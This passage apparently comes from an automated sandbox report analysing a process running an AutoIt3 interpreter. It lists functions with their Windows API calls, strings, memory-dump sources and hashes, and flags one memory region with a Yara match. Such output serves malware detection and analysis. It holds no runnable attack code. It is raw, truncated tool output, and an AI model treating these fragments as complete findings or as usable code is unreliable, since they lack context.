                                      • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00889339
                                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 00889391
                                      • SendMessageW.USER32(?,0000133D,?,?), ref: 0088943E
                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00889460
                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 008894AA
                                      • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 008894D7
                                      • DrawMenuBar.USER32(?), ref: 008894E6
                                      • SetWindowTextW.USER32(?,0000014E), ref: 0088950E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                      • String ID: 0
                                      • API String ID: 1073566785-4108050209
                                      • Opcode ID: c60547ea1520eac51ea55d9bb0314fbdce2dca2e361dccea02362a75f96701ff
                                      • Instruction ID: 3383718365276a5f2ace88a5ce63913cdf9604fcfbdce7a3ad4ad19587db4051
                                      • Opcode Fuzzy Hash: c60547ea1520eac51ea55d9bb0314fbdce2dca2e361dccea02362a75f96701ff
                                      • Instruction Fuzzy Hash: 7EE19C75900219AFDB21AF94CC88EFE7BB8FF05710F088156F959EA291D7708A81DF61
                                      Function 00884ECC Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCursorPos.USER32(?), ref: 00885007
                                      • GetDesktopWindow.USER32 ref: 0088501C
                                      • GetWindowRect.USER32(00000000), ref: 00885023
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00885085
                                      • DestroyWindow.USER32(?), ref: 008850B1
                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 008850DA
                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 008850F8
                                      • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 0088511E
                                      • SendMessageW.USER32(?,00000421,?,?), ref: 00885133
                                      • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00885146
                                      • IsWindowVisible.USER32(?), ref: 00885166
                                      • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00885181
                                      • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00885195
                                      • GetWindowRect.USER32(?,?), ref: 008851AD
                                      • MonitorFromPoint.USER32(?,?,00000002), ref: 008851D3
                                      • GetMonitorInfoW.USER32(00000000,?), ref: 008851ED
                                      • CopyRect.USER32(?,?), ref: 00885204
                                      • SendMessageW.USER32(?,00000412,00000000), ref: 0088526F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                      • String ID: ($0$tooltips_class32
                                      • API String ID: 698492251-4156429822
                                      • Opcode ID: 48b6cdafd51405f5e4fa60e2d07752a1ec4b9c89dc61c7ba9711b27093cbf48d
                                      • Instruction ID: 30dbc4b15d5538da6e4e484d082bf7c67e06f33dacb3cb5bf08f822f1e4cdcdc
                                      • Opcode Fuzzy Hash: 48b6cdafd51405f5e4fa60e2d07752a1ec4b9c89dc61c7ba9711b27093cbf48d
                                      • Instruction Fuzzy Hash: CDB15771604B41AFD744EF68C849A6ABBE4FF88310F008A1DF599DB291DB71E805CF92
                                      Function 00820429 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 349COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00811821: _memmove.LIBCMT ref: 0081185B
                                      • GetForegroundWindow.USER32(00890980,?,?,?,?,?), ref: 008204E3
                                      • IsWindow.USER32(?), ref: 008566BB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Window$Foreground_memmove
                                      • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                      • API String ID: 3828923867-1919597938
                                      • Opcode ID: 4295f9bdc58508ed5de169f019333f896655cd25e248d982e815166e04e64e5c
                                      • Instruction ID: 19296bf6b469ac3419349e67383bd5d0560125dee50f935d1625132e6dbe2e40
                                      • Opcode Fuzzy Hash: 4295f9bdc58508ed5de169f019333f896655cd25e248d982e815166e04e64e5c
                                      • Instruction Fuzzy Hash: 56D1B270104206EFCB04EF64D4419AABBA5FF64349F504A19F955C32A2EB30E9ADCF92
                                      Function 03D02210 Relevance: 28.4, APIs: 14, Strings: 2, Instructions: 351windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDC.USER32(00000000), ref: 03D0247A
                                      • CreateCompatibleDC.GDI32(00000001), ref: 03D024DF
                                      • CreateCompatibleBitmap.GDI32(00000001,00000001,00000001), ref: 03D024F4
                                      • SelectObject.GDI32(?,00000000), ref: 03D024FE
                                      • SelectPalette.GDI32(?,?,00000000), ref: 03D0252E
                                      • RealizePalette.GDI32(?), ref: 03D0253A
                                      • CreateDIBitmap.GDI32(?,?,00000004,00000000,?,00000000), ref: 03D0255E
                                      • GetLastError.KERNEL32(?,?,00000004,00000000,?,00000000,00000000,03D025B7,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 03D0256C
                                      • SelectPalette.GDI32(?,00000000,000000FF), ref: 03D0259E
                                      • SelectObject.GDI32(?,?), ref: 03D025AB
                                      • DeleteObject.GDI32(00000000), ref: 03D025B1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Select$CreateObjectPalette$BitmapCompatible$DeleteErrorLastRealize
                                      • String ID: ($BM
                                      • API String ID: 2831685396-2980357723
                                      • Opcode ID: 36b5b97c4fd3fc11ae7febbb7e9dd0f10f55bc82700164e8eca1c3633135a3ca
                                      • Instruction ID: 03522665624a2b4295a4a2ef68cc096b8e5c9bfc5664f4ce19e801903dcbdbdb
                                      • Opcode Fuzzy Hash: 36b5b97c4fd3fc11ae7febbb7e9dd0f10f55bc82700164e8eca1c3633135a3ca
                                      • Instruction Fuzzy Hash: 2CD14D74E012489FDF14DFA8C898BAEBBB5FF48700F058869E915EB394D7349841CB65
                                      Function 0088441F Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CharUpperBuffW.USER32(?,?), ref: 008844AC
                                      • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 0088456C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: BuffCharMessageSendUpper
                                      • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                      • API String ID: 3974292440-719923060
                                      • Opcode ID: 563278871b8caea12d2380bd0e9d1e7111aa2f858087b0371e6097b8f845a068
                                      • Instruction ID: a1f94686ee0cebf1e68f8ef7b45e407c4c732e56ef9f0ae837ffd904e4b48ea6
                                      • Opcode Fuzzy Hash: 563278871b8caea12d2380bd0e9d1e7111aa2f858087b0371e6097b8f845a068
                                      • Instruction Fuzzy Hash: AFA18B712146169FCB14FF68C851A6AB3A5FF85314F105928F996DB3D2DB30EC09CB52
                                      Function 008756C8 Relevance: 27.1, APIs: 18, Instructions: 124COMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadCursorW.USER32(00000000,00007F89), ref: 008756E1
                                      • LoadCursorW.USER32(00000000,00007F8A), ref: 008756EC
                                      • LoadCursorW.USER32(00000000,00007F00), ref: 008756F7
                                      • LoadCursorW.USER32(00000000,00007F03), ref: 00875702
                                      • LoadCursorW.USER32(00000000,00007F8B), ref: 0087570D
                                      • LoadCursorW.USER32(00000000,00007F01), ref: 00875718
                                      • LoadCursorW.USER32(00000000,00007F81), ref: 00875723
                                      • LoadCursorW.USER32(00000000,00007F88), ref: 0087572E
                                      • LoadCursorW.USER32(00000000,00007F80), ref: 00875739
                                      • LoadCursorW.USER32(00000000,00007F86), ref: 00875744
                                      • LoadCursorW.USER32(00000000,00007F83), ref: 0087574F
                                      • LoadCursorW.USER32(00000000,00007F85), ref: 0087575A
                                      • LoadCursorW.USER32(00000000,00007F82), ref: 00875765
                                      • LoadCursorW.USER32(00000000,00007F84), ref: 00875770
                                      • LoadCursorW.USER32(00000000,00007F04), ref: 0087577B
                                      • LoadCursorW.USER32(00000000,00007F02), ref: 00875786
                                      • GetCursorInfo.USER32(?), ref: 00875796
                                      • GetLastError.KERNEL32(00000001,00000000), ref: 008757C1
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Cursor$Load$ErrorInfoLast
                                      • String ID:
                                      • API String ID: 3215588206-0
                                      • Opcode ID: 942701210c3edb15a2c97e927faa7dec9ddc782b583778ef17f3bc96b60c1ab0
                                      • Instruction ID: 3412dbc25b77f58b4c6371a31a7f4309be04825f4b3abdd30539d4c6718887f0
                                      • Opcode Fuzzy Hash: 942701210c3edb15a2c97e927faa7dec9ddc782b583778ef17f3bc96b60c1ab0
                                      • Instruction Fuzzy Hash: C2416270E04319AADB109FBA8C49D6EFFF8FF41B50B10452FE519E7290DAB8A500CE51
                                      Function 0085B13A Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetClassNameW.USER32(?,?,00000100), ref: 0085B17B
                                      • __swprintf.LIBCMT ref: 0085B21C
                                      • _wcscmp.LIBCMT ref: 0085B22F
                                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0085B284
                                      • _wcscmp.LIBCMT ref: 0085B2C0
                                      • GetClassNameW.USER32(?,?,00000400), ref: 0085B2F7
                                      • GetDlgCtrlID.USER32(?), ref: 0085B349
                                      • GetWindowRect.USER32(?,?), ref: 0085B37F
                                      • GetParent.USER32(?), ref: 0085B39D
                                      • ScreenToClient.USER32(00000000), ref: 0085B3A4
                                      • GetClassNameW.USER32(?,?,00000100), ref: 0085B41E
                                      • _wcscmp.LIBCMT ref: 0085B432
                                      • GetWindowTextW.USER32(?,?,00000400), ref: 0085B458
                                      • _wcscmp.LIBCMT ref: 0085B46C
                                        • Part of subcall function 0082385C: _iswctype.LIBCMT ref: 00823864
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                      • String ID: %s%u
                                      • API String ID: 3744389584-679674701
                                      • Opcode ID: cd7a27045b99bf6085103062ed246f65bf6b3fd5ea7c44ca19e18b85ee93d7f9
                                      • Instruction ID: e0b94ef4a9996ae5fcb5d845f6c2d958d201c74b9d0e302b142532a726121d5d
                                      • Opcode Fuzzy Hash: cd7a27045b99bf6085103062ed246f65bf6b3fd5ea7c44ca19e18b85ee93d7f9
                                      • Instruction Fuzzy Hash: C9A1F071204306AFDB24DF64C884BEAB7E8FF64356F004529FD99D2191DB30E959CBA1
                                      Function 0085BA6D Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetClassNameW.USER32(00000008,?,00000400), ref: 0085BAB1
                                      • _wcscmp.LIBCMT ref: 0085BAC2
                                      • GetWindowTextW.USER32(00000001,?,00000400), ref: 0085BAEA
                                      • CharUpperBuffW.USER32(?,00000000), ref: 0085BB07
                                      • _wcscmp.LIBCMT ref: 0085BB25
                                      • _wcsstr.LIBCMT ref: 0085BB36
                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 0085BB6E
                                      • _wcscmp.LIBCMT ref: 0085BB7E
                                      • GetWindowTextW.USER32(00000002,?,00000400), ref: 0085BBA5
                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 0085BBEE
                                      • _wcscmp.LIBCMT ref: 0085BBFE
                                      • GetClassNameW.USER32(00000010,?,00000400), ref: 0085BC26
                                      • GetWindowRect.USER32(00000004,?), ref: 0085BC8F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                      • String ID: @$ThumbnailClass
                                      • API String ID: 1788623398-1539354611
                                      • Opcode ID: 80b79d08fad8fb99af9205dadb3b6d35c1bdeb2c98598dfa56a1d715e40a1291
                                      • Instruction ID: 6dc556fd876aee89d3f0ac6e828420fcc12be482dbe0a24c346dbcb21adc4a4f
                                      • Opcode Fuzzy Hash: 80b79d08fad8fb99af9205dadb3b6d35c1bdeb2c98598dfa56a1d715e40a1291
                                      • Instruction Fuzzy Hash: 8F81AF710042099FDB01DF14C885FAA77E8FF64325F04846AFD89CA096DB34DD49CB62
                                      Function 0085B8B6 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: __wcsnicmp
                                      • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                      • API String ID: 1038674560-1810252412
                                      • Opcode ID: 9f854f25a2a3e1a8e7f26eb4a9364bd07b38df00da31651c61c6322c94057368
                                      • Instruction ID: cad46cea848f5f4b2a64f57558696ca9517c21adc61c0d77f553415434ef493f
                                      • Opcode Fuzzy Hash: 9f854f25a2a3e1a8e7f26eb4a9364bd07b38df00da31651c61c6322c94057368
                                      • Instruction Fuzzy Hash: 9D31EF70A44209A6CE08EB54CC43EED7BA8FF31791F200125FA60F12D1FF69AE488587
                                      Function 0085CB97 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadIconW.USER32(00000063), ref: 0085CBAA
                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0085CBBC
                                      • SetWindowTextW.USER32(?,?), ref: 0085CBD3
                                      • GetDlgItem.USER32(?,000003EA), ref: 0085CBE8
                                      • SetWindowTextW.USER32(00000000,?), ref: 0085CBEE
                                      • GetDlgItem.USER32(?,000003E9), ref: 0085CBFE
                                      • SetWindowTextW.USER32(00000000,?), ref: 0085CC04
                                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0085CC25
                                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0085CC3F
                                      • GetWindowRect.USER32(?,?), ref: 0085CC48
                                      • SetWindowTextW.USER32(?,?), ref: 0085CCB3
                                      • GetDesktopWindow.USER32 ref: 0085CCB9
                                      • GetWindowRect.USER32(00000000), ref: 0085CCC0
                                      • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0085CD0C
                                      • GetClientRect.USER32(?,?), ref: 0085CD19
                                      • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0085CD3E
                                      • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0085CD69
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                      • String ID:
                                      • API String ID: 3869813825-0
                                      • Opcode ID: cc25b138da415a47f35b8f96fa165e6bb3d3d9a4943ae633a4d2997fb90030aa
                                      • Instruction ID: 39c8c01823d3775871c426a1ee2641daf1feb9d82e001b5b8d94d93d37a23b6b
                                      • Opcode Fuzzy Hash: cc25b138da415a47f35b8f96fa165e6bb3d3d9a4943ae633a4d2997fb90030aa
                                      • Instruction Fuzzy Hash: 48516E71900709EFDB21AFA8CE85B6EBBF5FF04706F000519E986E25A0D775A918CF50
                                      Function 0088A7DE Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 0088A87E
                                      • DestroyWindow.USER32(?,?), ref: 0088A8F8
                                        • Part of subcall function 00811821: _memmove.LIBCMT ref: 0081185B
                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0088A972
                                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0088A994
                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0088A9A7
                                      • DestroyWindow.USER32(00000000), ref: 0088A9C9
                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00800000,00000000), ref: 0088AA00
                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0088AA19
                                      • GetDesktopWindow.USER32 ref: 0088AA32
                                      • GetWindowRect.USER32(00000000), ref: 0088AA39
                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0088AA51
                                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0088AA69
                                        • Part of subcall function 008029AB: GetWindowLongW.USER32(?,000000EB), ref: 008029BC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                      • String ID: 0$tooltips_class32
                                      • API String ID: 1297703922-3619404913
                                      • Opcode ID: b62ece3a3c131f7b3755912f384dbead27f0f917dc445e81e8c922cb8a5b677b
                                      • Instruction ID: 650ba9426c768902c07c371f6a7254a16ea2417a21e7ffbc2148dbd36e7b1cca
                                      • Opcode Fuzzy Hash: b62ece3a3c131f7b3755912f384dbead27f0f917dc445e81e8c922cb8a5b677b
                                      • Instruction Fuzzy Hash: 0E718871144204AFE729EF28CC49F6A7BE5FB88304F08452EF995C72A1D774A901DF56
                                      Function 0088CCA6 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 008029E2: GetWindowLongW.USER32(?,000000EB), ref: 008029F3
                                      • DragQueryPoint.SHELL32(?,?), ref: 0088CCCF
                                        • Part of subcall function 0088B1A9: ClientToScreen.USER32(01183D90,?), ref: 0088B1D2
                                        • Part of subcall function 0088B1A9: GetWindowRect.USER32(?,?), ref: 0088B248
                                        • Part of subcall function 0088B1A9: PtInRect.USER32(?,?,0088C6BC), ref: 0088B258
                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 0088CD38
                                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0088CD43
                                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0088CD66
                                      • _wcscat.LIBCMT ref: 0088CD96
                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0088CDAD
                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 0088CDC6
                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 0088CDDD
                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 0088CDFF
                                      • DragFinish.SHELL32(?), ref: 0088CE06
                                      • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0088CEF9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                      • API String ID: 169749273-3440237614
                                      • Opcode ID: f24eefb74c9d203f919884f1770136a258db057897b69512ef13652520f34161
                                      • Instruction ID: 019ae33e35b2b46f88bdceb1c80b57b5346d755dc97dd8f750ff54ae43d59cd5
                                      • Opcode Fuzzy Hash: f24eefb74c9d203f919884f1770136a258db057897b69512ef13652520f34161
                                      • Instruction Fuzzy Hash: BB614B71108301AFC711EF54DC89D9BBBE8FF88750F000A2EF695D22A1DB709A49CB62
                                      Function 008682D5 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 378timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • VariantInit.OLEAUT32(00000000), ref: 0086831A
                                      • VariantCopy.OLEAUT32(00000000,?), ref: 00868323
                                      • VariantClear.OLEAUT32(00000000), ref: 0086832F
                                      • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0086841D
                                      • __swprintf.LIBCMT ref: 0086844D
                                      • VarR8FromDec.OLEAUT32(?,?), ref: 00868479
                                      • VariantInit.OLEAUT32(?), ref: 0086852A
                                      • SysFreeString.OLEAUT32(?), ref: 008685BE
                                      • VariantClear.OLEAUT32(?), ref: 00868618
                                      • VariantClear.OLEAUT32(?), ref: 00868627
                                      • VariantInit.OLEAUT32(00000000), ref: 00868665
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
